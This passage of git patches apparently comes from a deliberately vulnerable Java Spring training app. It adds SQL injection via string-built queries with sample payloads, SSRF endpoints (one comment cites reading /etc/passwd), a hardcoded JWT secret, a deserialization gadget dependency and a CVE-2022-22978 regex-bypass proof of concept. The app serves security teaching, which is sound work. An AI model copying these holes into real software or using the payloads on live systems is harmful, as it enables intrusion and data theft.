     <orderEntry type="library" name="Maven: org.apache.commons:commons-digester3:3.2" level="project" />
     <orderEntry type="library" name="Maven: cglib:cglib:2.2.2" level="project" />
     <orderEntry type="library" name="Maven: asm:asm:3.3.1" level="project" />
-    <orderEntry type="library" name="Maven: commons-beanutils:commons-beanutils:1.9.3" level="project" />
     <orderEntry type="library" name="Maven: org.jolokia:jolokia-core:1.6.0" level="project" />
     <orderEntry type="library" name="Maven: com.googlecode.json-simple:json-simple:1.1.1" level="project" />
     <orderEntry type="library" name="Maven: org.springframework.boot:spring-boot-starter-actuator:1.5.1.RELEASE" level="project" />
@@ -219,5 +218,8 @@
     <orderEntry type="library" name="Maven: org.springframework:spring-test:4.3.6.RELEASE" level="project" />
     <orderEntry type="library" name="Maven: junit:junit:4.12" level="project" />
     <orderEntry type="library" name="Maven: org.hamcrest:hamcrest-core:1.3" level="project" />
+    <orderEntry type="library" name="Maven: commons-beanutils:commons-beanutils:1.9.4" level="project" />
+    <orderEntry type="library" name="Maven: io.jsonwebtoken:jjwt:0.9.1" level="project" />
+    <orderEntry type="library" name="Maven: com.auth0:java-jwt:4.0.0" level="project" />
   </component>
 </module>
\ No newline at end of file
diff --git a/pom.xml b/pom.xml
index e22713da..aa8e89a5 100644
--- a/pom.xml
+++ b/pom.xml
@@ -279,6 +279,27 @@
             <artifactId>junit</artifactId>
         </dependency>
 
+        <!-- add commons-beanutils gadget -->
+        <dependency>
+            <groupId>commons-beanutils</groupId>
+            <artifactId>commons-beanutils</artifactId>
+            <version>1.9.4</version>
+        </dependency>
+
+        <!-- https://mvnrepository.com/artifact/io.jsonwebtoken/jjwt -->
+        <dependency>
+            <groupId>io.jsonwebtoken</groupId>
+            <artifactId>jjwt</artifactId>
+            <version>0.9.1</version>
+        </dependency>
+
+        <!-- https://github.com/auth0/java-jwt https://mvnrepository.com/artifact/com.auth0/java-jwt -->
+        <dependency>
+            <groupId>com.auth0</groupId>
+            <artifactId>java-jwt</artifactId>
+            <version>4.0.0</version>
+        </dependency>
+
     </dependencies>
 
     <dependencyManagement>
diff --git a/src/main/java/org/joychou/Application.java b/src/main/java/org/joychou/Application.java
index 0f04b2c8..41169b9a 100644
--- a/src/main/java/org/joychou/Application.java
+++ b/src/main/java/org/joychou/Application.java
@@ -8,7 +8,6 @@
 import org.springframework.cloud.netflix.eureka.EnableEurekaClient;
 
 
-
 @ServletComponentScan // do filter
 @SpringBootApplication
 // @EnableEurekaClient  // 测试Eureka请打开注释，防止控制台一直有warning
diff --git a/src/main/java/org/joychou/controller/Deserialize.java b/src/main/java/org/joychou/controller/Deserialize.java
index 45662e9c..9531e980 100644
--- a/src/main/java/org/joychou/controller/Deserialize.java
+++ b/src/main/java/org/joychou/controller/Deserialize.java
@@ -57,6 +57,9 @@ public String rememberMeVul(HttpServletRequest request)
 
     /**
      * Check deserialize class using black list.
+     * Or
+     * Update commons-collections to 3.2.2 or above.
+     * Serialization support for org.apache.commons.collections.functors.InvokerTransformer is disabled for security reasons.To enable it set system property 'org.apache.commons.collections.enableUnsafeSerialization' to 'true',but you must ensure that your application does not de-serialize objects from untrusted sources.
      * <p>
      * http://localhost:8080/deserialize/rememberMe/security
      */
diff --git a/src/main/java/org/joychou/controller/Jwt.java b/src/main/java/org/joychou/controller/Jwt.java
new file mode 100644
index 00000000..522fd44a
--- /dev/null
+++ b/src/main/java/org/joychou/controller/Jwt.java
@@ -0,0 +1,62 @@
+package org.joychou.controller;
+
+import lombok.extern.slf4j.Slf4j;
+import org.joychou.util.CookieUtils;
+import org.joychou.util.JwtUtils;
+import org.springframework.web.bind.annotation.CookieValue;
+import org.springframework.web.bind.annotation.GetMapping;
+import org.springframework.web.bind.annotation.RequestMapping;
+import org.springframework.web.bind.annotation.RestController;
+
+import javax.servlet.http.Cookie;
+import javax.servlet.http.HttpServletRequest;
+import javax.servlet.http.HttpServletResponse;
+
+
+/**
+ *
+ */
+@Slf4j
+@RestController
+@RequestMapping("/jwt")
+public class Jwt {
+
+    private static final String COOKIE_NAME = "USER_COOKIE";
+    /**
+     * http://localhost:8080/jwt/createToken
+     * Create jwt token and set token to cookies.
+     *
+     * @author JoyChou 2022-09-20
+     */
+    @GetMapping("/createToken")
+    public String createToken(HttpServletResponse response, HttpServletRequest request) {
+        String loginUser = request.getUserPrincipal().getName();
+        log.info("Current login user is " + loginUser);
+
+        CookieUtils.deleteCookie(response, COOKIE_NAME);
+        String token = JwtUtils.generateTokenByJavaJwt(loginUser);
+        Cookie cookie = new Cookie(COOKIE_NAME, token);
+
+        cookie.setMaxAge(86400);    // 1 DAY
+        cookie.setPath("/");
+        cookie.setSecure(true);
+        response.addCookie(cookie);
+        return "Add jwt token cookie successfully. Cookie name is USER_COOKIE";
+    }
+
+
+    /**
+     * http://localhost:8080/jwt/getName
+     * Get nickname from USER_COOKIE
+     *
+     * @author JoyChou 2022-09-20
+     * @param user_cookie cookie
+     * @return nickname
+     */
+    @GetMapping("/getName")
+    public String getNickname(@CookieValue(COOKIE_NAME) String user_cookie) {
+        String nickname = JwtUtils.getNicknameByJavaJwt(user_cookie);
+        return "Current jwt user is " + nickname;
+    }
+
+}
diff --git a/src/main/java/org/joychou/controller/SQLI.java b/src/main/java/org/joychou/controller/SQLI.java
index afabfe15..6682115c 100644
--- a/src/main/java/org/joychou/controller/SQLI.java
+++ b/src/main/java/org/joychou/controller/SQLI.java
@@ -130,6 +130,50 @@ public String jdbc_sqli_sec(@RequestParam("username") String username) {
         return result.toString();
     }
 
+
+    /**
+     * http://localhost:8080/sqli/jdbc/ps/vuln?username=joychou' or 'a'='a
+     *
+     * Incorrect use of prepareStatement. prepareStatement must use ? as a placeholder.
+     */
+    @RequestMapping("/jdbc/ps/vuln")
+    public String jdbc_ps_vuln(@RequestParam("username") String username) {
+
+        StringBuilder result = new StringBuilder();
+        try {
+            Class.forName(driver);
+            Connection con = DriverManager.getConnection(url, user, password);
+
+            if (!con.isClosed())
+                System.out.println("Connecting to Database successfully.");
+
+            String sql = "select * from users where username = '" + username + "'";
+            PreparedStatement st = con.prepareStatement(sql);
+
+            logger.info(st.toString());
+            ResultSet rs = st.executeQuery();
+
+            while (rs.next()) {
+                String res_name = rs.getString("username");
+                String res_pwd = rs.getString("password");
+                String info = String.format("%s: %s\n", res_name, res_pwd);
+                result.append(info);
+                logger.info(info);
+            }
+
+            rs.close();
+            con.close();
+
+        } catch (ClassNotFoundException e) {
+            logger.error("Sorry, can`t find the Driver!");
+            e.printStackTrace();
+        } catch (SQLException e) {
+            logger.error(e.toString());
+        }
+        return result.toString();
+    }
+
+
     /**
      * vuln code
      * http://localhost:8080/sqli/mybatis/vuln01?username=joychou' or '1'='1
diff --git a/src/main/java/org/joychou/controller/SSRF.java b/src/main/java/org/joychou/controller/SSRF.java
index aa76f9fe..3f9a8762 100644
--- a/src/main/java/org/joychou/controller/SSRF.java
+++ b/src/main/java/org/joychou/controller/SSRF.java
@@ -76,6 +76,11 @@ public String httpURLConnection(@RequestParam String url) {
     }
 
 
+    @GetMapping("/HttpURLConnection/vuln")
+    public String httpURLConnectionVuln(@RequestParam String url) {
+        return HttpUtils.HttpURLConnection(url);
+    }
+
     /**
      * The default setting of followRedirects is true.
      * UserAgent is <code>Apache-HttpClient/4.5.12 (Java/1.8.0_102)</code>.
diff --git a/src/main/java/org/joychou/util/CookieUtils.java b/src/main/java/org/joychou/util/CookieUtils.java
new file mode 100644
index 00000000..eddae0db
--- /dev/null
+++ b/src/main/java/org/joychou/util/CookieUtils.java
@@ -0,0 +1,24 @@
+package org.joychou.util;
+
+import lombok.extern.slf4j.Slf4j;
+
+import javax.servlet.http.Cookie;
+import javax.servlet.http.HttpServletResponse;
+
+
+@Slf4j
+public class CookieUtils {
+
+    public static boolean deleteCookie(HttpServletResponse res, String cookieName) {
+        try {
+            Cookie cookie = new Cookie(cookieName, null);
+            cookie.setMaxAge(0);
+            cookie.setPath("/");
+            res.addCookie(cookie);
+            return true;
+        } catch (Exception e) {
+            log.error(e.toString());
+            return false;
+        }
+    }
+}
diff --git a/src/main/java/org/joychou/util/HttpUtils.java b/src/main/java/org/joychou/util/HttpUtils.java
index 4f608301..d0be6dd3 100644
--- a/src/main/java/org/joychou/util/HttpUtils.java
+++ b/src/main/java/org/joychou/util/HttpUtils.java
@@ -110,12 +110,17 @@ public static String URLConnection(String url) {
     }
 
 
+    /**
+     * The default setting of followRedirects is true.
+     * UserAgent is Java/1.8.0_102.
+     */
     public static String HttpURLConnection(String url) {
         try {
             URL u = new URL(url);
             URLConnection urlConnection = u.openConnection();
             HttpURLConnection conn = (HttpURLConnection) urlConnection;
-            // Many HttpURLConnection methods can send http request, such as getResponseCode, getHeaderField
+//             conn.setInstanceFollowRedirects(false);
+//             Many HttpURLConnection methods can send http request, such as getResponseCode, getHeaderField
             InputStream is = conn.getInputStream();  // send request
             BufferedReader in = new BufferedReader(new InputStreamReader(is));
             String inputLine;
@@ -165,6 +170,13 @@ public static String okhttp(String url) throws IOException {
     }
 
 
+    /**
+     * The default setting of followRedirects is true.
+     *
+     * UserAgent is Java/1.8.0_102.
+     *
+     * @param url http request url
+     */
     public static void imageIO(String url) {
         try {
             URL u = new URL(url);
diff --git a/src/main/java/org/joychou/util/JwtUtils.java b/src/main/java/org/joychou/util/JwtUtils.java
new file mode 100644
index 00000000..3ee6c89d
--- /dev/null
+++ b/src/main/java/org/joychou/util/JwtUtils.java
@@ -0,0 +1,103 @@
+package org.joychou.util;
+
+import com.auth0.jwt.JWT;
+import com.auth0.jwt.JWTVerifier;
+import com.auth0.jwt.algorithms.Algorithm;
+import com.auth0.jwt.exceptions.JWTVerificationException;
+import io.jsonwebtoken.Claims;
+import io.jsonwebtoken.Jwts;
+import io.jsonwebtoken.SignatureAlgorithm;
+import lombok.extern.slf4j.Slf4j;
+
+import java.nio.charset.StandardCharsets;
+import java.util.Base64;
+import java.util.Date;
+
+@Slf4j
+public class JwtUtils {
+
+    private static final long EXPIRE = 1440 * 60 * 1000;  // 1440 Minutes, 1 DAY
+    private static final String SECRET = "123456";
+    private static final String B64_SECRET = Base64.getEncoder().encodeToString(SECRET.getBytes(StandardCharsets.UTF_8));
+
+    /**
+     * Generate JWT Token by jjwt (last update time: Jul 05, 2018)
+     *
+     * @author JoyChou 2022-09-20
+     * @param userId userid
+     * @return token
+     */
+    public static String generateTokenByJjwt(String userId) {
+        return Jwts.builder()
+                .setHeaderParam("typ", "JWT")   // header
+                .setHeaderParam("alg", "HS256")     // header
+                .setIssuedAt(new Date())    // token发布时间
+                .setExpiration(new Date(System.currentTimeMillis() + EXPIRE))   // token过期时间
+                .claim("userid", userId)
+                // secret在signWith会base64解码，但网上很多代码示例并没对secret做base64编码，所以在爆破key的时候可以注意下。
+                .signWith(SignatureAlgorithm.HS256, B64_SECRET)
+                .compact();
+    }
+
+    public static String getUserIdFromJjwtToken(String token) {
+        try {
+            Claims claims = Jwts.parser().setSigningKey(B64_SECRET).parseClaimsJws(token).getBody();
+            return (String)claims.get("userid");
+        } catch (Exception e) {
+            return e.toString();
+        }
+    }
+
+    /**
+     * Generate jwt token by java-jwt.
+     *
+     * @author JoyChou 2022-09-20
+     * @param nickname nickname
+     * @return jwt token
+     */
+    public static String generateTokenByJavaJwt(String nickname) {
+        return JWT.create()
+                .withClaim("nickname", nickname)
+                .withExpiresAt(new Date(System.currentTimeMillis() + EXPIRE))
+                .withIssuedAt(new Date())
+                .sign(Algorithm.HMAC256(SECRET));
+    }
+
+
+    /**
+     * Verify JWT Token
+     * @param token token
+     * @return Valid token returns true. Invalid token returns false.
+     */
+    public static Boolean verifyTokenByJavaJwt(String token) {
+        try {
+            Algorithm algorithm = Algorithm.HMAC256(SECRET);
+            JWTVerifier verifier = JWT.require(algorithm).build();
+            verifier.verify(token);
+            return true;
+        } catch (JWTVerificationException exception){
+            log.error(exception.toString());
+            return false;
+        }
+    }
+
+
+    public static String getNicknameByJavaJwt(String token) {
+        if (!verifyTokenByJavaJwt(token)) {
+            log.error("token is invalid");
+            return null;
+        }
+        return JWT.decode(token).getClaim("nickname").asString();
+    }
+
+
+    public static void main(String[] args) {
+        String jjwtToken = generateTokenByJjwt("10000");
+        System.out.println(jjwtToken);
+        System.out.println(getUserIdFromJjwtToken(jjwtToken));
+
+        String token = generateTokenByJavaJwt("JoyChou");
+        System.out.println(token);
+        System.out.println(getNicknameByJavaJwt(token));
+    }
+}
diff --git a/src/main/resources/templates/index.html b/src/main/resources/templates/index.html
index 9d27f958..8511d5fd 100644
--- a/src/main/resources/templates/index.html
+++ b/src/main/resources/templates/index.html
@@ -21,6 +21,11 @@
         <a th:href="@{/ooxml/upload}">ooxml XXE</a>&nbsp;&nbsp;
         <a th:href="@{/xlsx-streamer/upload}">xlsx-streamer XXE</a>
     </p>
+
+    <P>
+        <a th:href="@{/jwt/createToken}">JWTCreateToken</a>
+        <a th:href="@{/jwt/getName}">GetUserFromJWTToken</a>
+    </P>
     <p>...</p>
     <a th:href="@{/logout}">logout</a>
 

From e4190d6213d4892d7b49cb15d016d833d011562c Mon Sep 17 00:00:00 2001
From: JoyChou <viarus@qq.com>
Date: Fri, 21 Oct 2022 20:13:28 +0800
Subject: [PATCH 088/108] Add RestTemplate SSRF

---
 .../org/joychou/config/HttpServiceConfig.java | 38 ++++++++++++++++
 .../java/org/joychou/controller/SSRF.java     | 31 ++++++++++++-
 .../java/org/joychou/filter/OriginFilter.java |  2 -
 .../org/joychou/impl/HttpServiceImpl.java     | 44 +++++++++++++++++++
 .../java/org/joychou/service/HttpService.java | 11 +++++
 src/main/java/org/joychou/util/HttpUtils.java |  1 -
 src/main/java/org/joychou/util/JwtUtils.java  |  1 +
 7 files changed, 124 insertions(+), 4 deletions(-)
 create mode 100644 src/main/java/org/joychou/config/HttpServiceConfig.java
 create mode 100644 src/main/java/org/joychou/impl/HttpServiceImpl.java
 create mode 100644 src/main/java/org/joychou/service/HttpService.java

diff --git a/src/main/java/org/joychou/config/HttpServiceConfig.java b/src/main/java/org/joychou/config/HttpServiceConfig.java
new file mode 100644
index 00000000..64477bd4
--- /dev/null
+++ b/src/main/java/org/joychou/config/HttpServiceConfig.java
@@ -0,0 +1,38 @@
+package org.joychou.config;
+
+import org.springframework.boot.web.client.RestTemplateBuilder;
+import org.springframework.context.annotation.Bean;
+import org.springframework.context.annotation.Configuration;
+import org.springframework.http.client.SimpleClientHttpRequestFactory;
+import org.springframework.web.client.RestTemplate;
+
+import java.io.IOException;
+import java.net.HttpURLConnection;
+
+
+class CustomClientHttpRequestFactory extends SimpleClientHttpRequestFactory {
+
+
+    @Override
+    protected void prepareConnection(HttpURLConnection connection, String httpMethod) throws IOException {
+        super.prepareConnection(connection, httpMethod);
+        // Use custom ClientHttpRequestFactory to set followRedirects false.
+        connection.setInstanceFollowRedirects(false);
+    }
+}
+
+@Configuration
+public class HttpServiceConfig {
+
+    @Bean
+    public RestTemplate restTemplateBanRedirects(RestTemplateBuilder builder) {
+        return builder.requestFactory(CustomClientHttpRequestFactory.class).build();
+    }
+
+
+    @Bean
+    public RestTemplate restTemplate(RestTemplateBuilder builder) {
+        return builder.build();
+    }
+
+}
\ No newline at end of file
diff --git a/src/main/java/org/joychou/controller/SSRF.java b/src/main/java/org/joychou/controller/SSRF.java
index 3f9a8762..72044a7a 100644
--- a/src/main/java/org/joychou/controller/SSRF.java
+++ b/src/main/java/org/joychou/controller/SSRF.java
@@ -2,12 +2,16 @@
 
 import org.joychou.security.SecurityUtil;
 import org.joychou.security.ssrf.SSRFException;
+import org.joychou.service.HttpService;
 import org.joychou.util.HttpUtils;
 import org.joychou.util.WebUtils;
 import org.slf4j.Logger;
 import org.slf4j.LoggerFactory;
+import org.springframework.http.HttpHeaders;
+import org.springframework.http.MediaType;
 import org.springframework.web.bind.annotation.*;
 
+import javax.annotation.Resource;
 import javax.servlet.http.HttpServletResponse;
 import java.io.*;
 import java.net.*;
@@ -23,8 +27,10 @@
 @RequestMapping("/ssrf")
 public class SSRF {
 
-    private static Logger logger = LoggerFactory.getLogger(SSRF.class);
+    private static final Logger logger = LoggerFactory.getLogger(SSRF.class);
 
+    @Resource
+    private HttpService httpService;
 
     /**
      * http://localhost:8080/ssrf/urlConnection/vuln?url=file:///etc/passwd
@@ -266,4 +272,27 @@ public String HttpSyncClients(@RequestParam("url") String url) {
     }
 
 
+    /**
+     * http://127.0.0.1:8080/ssrf/restTemplate/vuln?url=http://www.baidu.com <p>
+     * Only support HTTP protocol. <p>
+     * Redirects: GET HttpMethod follow redirects by default, other HttpMethods do not follow redirects<p>
+     * User-Agent: Java/1.8.0_102 <p>
+     */
+    @GetMapping("/restTemplate/vuln1")
+    public String RestTemplateUrlBanRedirects(String url){
+        HttpHeaders headers = new HttpHeaders();
+        headers.setContentType(MediaType.APPLICATION_JSON_UTF8);
+        return httpService.RequestHttpBanRedirects(url, headers);
+    }
+
+
+    @GetMapping("/restTemplate/vuln2")
+    public String RestTemplateUrl(String url){
+        HttpHeaders headers = new HttpHeaders();
+        headers.setContentType(MediaType.APPLICATION_JSON_UTF8);
+        return httpService.RequestHttp(url, headers);
+    }
+
+
+
 }
diff --git a/src/main/java/org/joychou/filter/OriginFilter.java b/src/main/java/org/joychou/filter/OriginFilter.java
index d57f667a..271a4562 100644
--- a/src/main/java/org/joychou/filter/OriginFilter.java
+++ b/src/main/java/org/joychou/filter/OriginFilter.java
@@ -6,8 +6,6 @@
 import javax.servlet.http.HttpServletRequest;
 import javax.servlet.http.HttpServletResponse;
 import java.io.IOException;
-
-import org.apache.catalina.servlet4preview.http.HttpFilter;
 import org.joychou.security.SecurityUtil;
 import org.slf4j.Logger;
 import org.slf4j.LoggerFactory;
diff --git a/src/main/java/org/joychou/impl/HttpServiceImpl.java b/src/main/java/org/joychou/impl/HttpServiceImpl.java
new file mode 100644
index 00000000..d3bbf3a1
--- /dev/null
+++ b/src/main/java/org/joychou/impl/HttpServiceImpl.java
@@ -0,0 +1,44 @@
+package org.joychou.impl;
+
+
+import org.joychou.service.HttpService;
+import org.springframework.http.HttpEntity;
+import org.springframework.http.HttpHeaders;
+import org.springframework.http.ResponseEntity;
+import org.springframework.stereotype.Service;
+import org.springframework.web.client.RestTemplate;
+import org.springframework.http.HttpMethod;
+
+import javax.annotation.Resource;
+
+@Service
+public class HttpServiceImpl implements HttpService {
+
+    @Resource
+    private RestTemplate restTemplate;
+
+    @Resource
+    private RestTemplate restTemplateBanRedirects;
+
+    /**
+     * Http request by RestTemplate. Only support HTTP protocol. <p>
+     * Redirects: GET HttpMethod follow redirects by default, other HttpMethods do not follow redirects.<p>
+     * User-Agent: Java/1.8.0_102 <p>
+     */
+    public String RequestHttp(String url, HttpHeaders headers) {
+        HttpEntity<String> entity = new HttpEntity<>(headers);
+        ResponseEntity<String> re = restTemplate.exchange(url, HttpMethod.GET, entity, String.class);
+        return re.getBody();
+    }
+
+    /**
+     * Http request by RestTemplate. Only support HTTP protocol. <p>
+     * Redirects: Disable followRedirects.<p>
+     * User-Agent: Java/1.8.0_102 <p>
+     */
+    public String RequestHttpBanRedirects(String url, HttpHeaders headers) {
+        HttpEntity<String> entity = new HttpEntity<>(headers);
+        ResponseEntity<String> re = restTemplateBanRedirects.exchange(url, HttpMethod.GET, entity, String.class);
+        return re.getBody();
+    }
+}
diff --git a/src/main/java/org/joychou/service/HttpService.java b/src/main/java/org/joychou/service/HttpService.java
new file mode 100644
index 00000000..198a5311
--- /dev/null
+++ b/src/main/java/org/joychou/service/HttpService.java
@@ -0,0 +1,11 @@
+package org.joychou.service;
+
+
+import org.springframework.http.HttpHeaders;
+
+public interface HttpService {
+
+    String RequestHttp(String url, HttpHeaders headers);
+
+    String RequestHttpBanRedirects(String url, HttpHeaders headers);
+}
diff --git a/src/main/java/org/joychou/util/HttpUtils.java b/src/main/java/org/joychou/util/HttpUtils.java
index d0be6dd3..a5b67dad 100644
--- a/src/main/java/org/joychou/util/HttpUtils.java
+++ b/src/main/java/org/joychou/util/HttpUtils.java
@@ -221,5 +221,4 @@ public static String HttpAsyncClients(String url) {
             }
         }
     }
-
 }
diff --git a/src/main/java/org/joychou/util/JwtUtils.java b/src/main/java/org/joychou/util/JwtUtils.java
index 3ee6c89d..bb33642e 100644
--- a/src/main/java/org/joychou/util/JwtUtils.java
+++ b/src/main/java/org/joychou/util/JwtUtils.java
@@ -83,6 +83,7 @@ public static Boolean verifyTokenByJavaJwt(String token) {
 
 
     public static String getNicknameByJavaJwt(String token) {
+        // If the signature is not verified, there will be security issues.
         if (!verifyTokenByJavaJwt(token)) {
             log.error("token is invalid");
             return null;

From 9acefb2b0c0d32b2cd07e83219b276f94cdb32e7 Mon Sep 17 00:00:00 2001
From: JoyChou <viarus@qq.com>
Date: Mon, 21 Nov 2022 18:44:54 +0800
Subject: [PATCH 089/108] add jwt

---
 java-sec-code.iml                              |  1 +
 pom.xml                                        |  6 ++++++
 src/main/java/org/joychou/controller/SSRF.java | 16 +++++++++++++++-
 3 files changed, 22 insertions(+), 1 deletion(-)

diff --git a/java-sec-code.iml b/java-sec-code.iml
index 445cfa46..9b423c61 100644
--- a/java-sec-code.iml
+++ b/java-sec-code.iml
@@ -221,5 +221,6 @@
     <orderEntry type="library" name="Maven: commons-beanutils:commons-beanutils:1.9.4" level="project" />
     <orderEntry type="library" name="Maven: io.jsonwebtoken:jjwt:0.9.1" level="project" />
     <orderEntry type="library" name="Maven: com.auth0:java-jwt:4.0.0" level="project" />
+    <orderEntry type="library" name="Maven: cn.hutool:hutool-all:5.8.10" level="project" />
   </component>
 </module>
\ No newline at end of file
diff --git a/pom.xml b/pom.xml
index aa8e89a5..751a4b35 100644
--- a/pom.xml
+++ b/pom.xml
@@ -300,6 +300,12 @@
             <version>4.0.0</version>
         </dependency>
 
+        <dependency>
+            <groupId>cn.hutool</groupId>
+            <artifactId>hutool-all</artifactId>
+            <version>5.8.10</version>
+        </dependency>
+
     </dependencies>
 
     <dependencyManagement>
diff --git a/src/main/java/org/joychou/controller/SSRF.java b/src/main/java/org/joychou/controller/SSRF.java
index 72044a7a..b4c4bde8 100644
--- a/src/main/java/org/joychou/controller/SSRF.java
+++ b/src/main/java/org/joychou/controller/SSRF.java
@@ -1,5 +1,6 @@
 package org.joychou.controller;
 
+import cn.hutool.http.HttpUtil;
 import org.joychou.security.SecurityUtil;
 import org.joychou.security.ssrf.SSRFException;
 import org.joychou.service.HttpService;
@@ -273,7 +274,7 @@ public String HttpSyncClients(@RequestParam("url") String url) {
 
 
     /**
-     * http://127.0.0.1:8080/ssrf/restTemplate/vuln?url=http://www.baidu.com <p>
+     * http://127.0.0.1:8080/ssrf/restTemplate/vuln1?url=http://www.baidu.com <p>
      * Only support HTTP protocol. <p>
      * Redirects: GET HttpMethod follow redirects by default, other HttpMethods do not follow redirects<p>
      * User-Agent: Java/1.8.0_102 <p>
@@ -294,5 +295,18 @@ public String RestTemplateUrl(String url){
     }
 
 
+    /**
+     * http://127.0.0.1:8080/ssrf/hutool/vuln?url=http://www.baidu.com <p>
+     * UserAgent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36 Hutool<p>
+     * Redirects: Do not follow redirects <p>
+     *
+     * @param url url
+     * @return contents of url
+     */
+    @GetMapping("/hutool/vuln")
+    public String hutoolHttp(String url){
+        return HttpUtil.get(url);
+    }
+
 
 }

From da04cccd476a5a620c2c508360512e601580ddaf Mon Sep 17 00:00:00 2001
From: JoyChou <viarus@qq.com>
Date: Mon, 16 Jan 2023 15:36:03 +0800
Subject: [PATCH 090/108] add CVE-2022-22978

---
 README.md                                     |  1 +
 README_zh.md                                  |  1 +
 .../java/org/joychou/controller/Dotall.java   | 32 +++++++++++++++++++
 .../security/CsrfAccessDeniedHandler.java     |  2 +-
 .../joychou/security/WebSecurityConfig.java   |  5 ++-
 src/main/java/org/joychou/util/HttpUtils.java |  4 +--
 6 files changed, 41 insertions(+), 4 deletions(-)
 create mode 100644 src/main/java/org/joychou/controller/Dotall.java

diff --git a/README.md b/README.md
index edfda09c..c7e886a6 100644
--- a/README.md
+++ b/README.md
@@ -30,6 +30,7 @@ Sort by letter.
 - [CORS](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/CORS.java)
 - [CRLF Injection](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/CRLFInjection.java)
 - [CSRF](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/security/WebSecurityConfig.java)
+- [CVE-2022-22978](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/security/WebSecurityConfig.java)
 - [Deserialize](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/Deserialize.java)
 - [Fastjson](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/Fastjson.java)
 - [File Upload](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/FileUpload.java)
diff --git a/README_zh.md b/README_zh.md
index 111c8be3..549766a5 100644
--- a/README_zh.md
+++ b/README_zh.md
@@ -26,6 +26,7 @@ joychou/joychou123
 - [CORS](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/CORS.java)
 - [CRLF Injection](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/CRLFInjection.java)
 - [CSRF](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/security/WebSecurityConfig.java)
+- [CVE-2022-22978](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/security/WebSecurityConfig.java)
 - [Deserialize](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/Deserialize.java)
 - [Fastjson](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/Fastjson.java)
 - [File Upload](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/FileUpload.java)
diff --git a/src/main/java/org/joychou/controller/Dotall.java b/src/main/java/org/joychou/controller/Dotall.java
new file mode 100644
index 00000000..d2dfc49d
--- /dev/null
+++ b/src/main/java/org/joychou/controller/Dotall.java
@@ -0,0 +1,32 @@
+package org.joychou.controller;
+
+
+
+import java.net.URLDecoder;
+import java.nio.charset.StandardCharsets;
+import java.util.regex.Pattern;
+
+
+/**
+ * Spring Security CVE-2022-22978 <p>
+ * <a href="https://github.com/JoyChou93/java-sec-code/wiki/CVE-2022-22978">漏洞相关wiki</a>
+ * @author JoyChou @2023-01-212
+ */
+
+public class Dotall {
+
+
+    /**
+     * <a href="https://github.com/spring-projects/spring-security/compare/5.5.6..5.5.7">官方spring-security修复commit记录</a>
+     * 漏洞描述：h
+     */
+    public static void main(String[] args) throws Exception{
+        Pattern vuln_pattern = Pattern.compile("/black_path.*");
+        Pattern sec_pattern = Pattern.compile("/black_path.*", Pattern.DOTALL);
+
+        String poc = URLDecoder.decode("/black_path%0a/xx", StandardCharsets.UTF_8.toString());
+        System.out.println("Poc: " + poc);
+        System.out.println("Not dotall: " + vuln_pattern.matcher(poc).matches());    // false，非dotall无法匹配\r\n
+        System.out.println("Dotall: " + sec_pattern.matcher(poc).matches());         // true，dotall可以匹配\r\n
+    }
+}
diff --git a/src/main/java/org/joychou/security/CsrfAccessDeniedHandler.java b/src/main/java/org/joychou/security/CsrfAccessDeniedHandler.java
index 2e1df795..4f8ad327 100644
--- a/src/main/java/org/joychou/security/CsrfAccessDeniedHandler.java
+++ b/src/main/java/org/joychou/security/CsrfAccessDeniedHandler.java
@@ -29,7 +29,7 @@ public void handle(HttpServletRequest request, HttpServletResponse response,
 
         response.setContentType(MediaType.TEXT_HTML_VALUE); // content-type: text/html
         response.setStatus(HttpServletResponse.SC_FORBIDDEN); // 403 forbidden
-        response.getWriter().write("CSRF check failed by JoyChou.");  // response contents
+        response.getWriter().write("403 forbidden by JoyChou.");  // response contents
     }
 
 }
diff --git a/src/main/java/org/joychou/security/WebSecurityConfig.java b/src/main/java/org/joychou/security/WebSecurityConfig.java
index 5e8c3697..9d90c698 100644
--- a/src/main/java/org/joychou/security/WebSecurityConfig.java
+++ b/src/main/java/org/joychou/security/WebSecurityConfig.java
@@ -62,13 +62,16 @@ protected void configure(HttpSecurity http) throws Exception {
                 .ignoringAntMatchers(csrfExcludeUrl)  // 不进行csrf校验的uri，多个uri使用逗号分隔
                 .csrfTokenRepository(new CookieCsrfTokenRepository());
         http.exceptionHandling().accessDeniedHandler(new CsrfAccessDeniedHandler());
-        // http.csrf().csrfTokenRepository(CookieCsrfTokenRepository.withHttpOnlyFalse());«
+
+        // http.csrf().csrfTokenRepository(CookieCsrfTokenRepository.withHttpOnlyFalse());
 
         http.cors();
 
         // spring security login settings
         http.authorizeRequests()
                 .antMatchers("/css/**", "/js/**").permitAll() // permit static resources
+                // CVE-2022-22978漏洞代码
+                .regexMatchers("/black_path.*").denyAll()    // 如果正则匹配到/black_path，则forbidden
                 .anyRequest().authenticated().and() // any request authenticated except above static resources
                 .formLogin().loginPage("/login").permitAll() // permit all to access /login page
                 .successHandler(new LoginSuccessHandler())
diff --git a/src/main/java/org/joychou/util/HttpUtils.java b/src/main/java/org/joychou/util/HttpUtils.java
index a5b67dad..2c248b29 100644
--- a/src/main/java/org/joychou/util/HttpUtils.java
+++ b/src/main/java/org/joychou/util/HttpUtils.java
@@ -146,7 +146,7 @@ public static String HttpURLConnection(String url) {
     public static String Jsoup(String url) {
         try {
             Document doc = Jsoup.connect(url)
-                    //.followRedirects(false)
+//                    .followRedirects(false)
                     .timeout(3000)
                     .cookie("name", "joychou") // request cookies
                     .execute().parse();
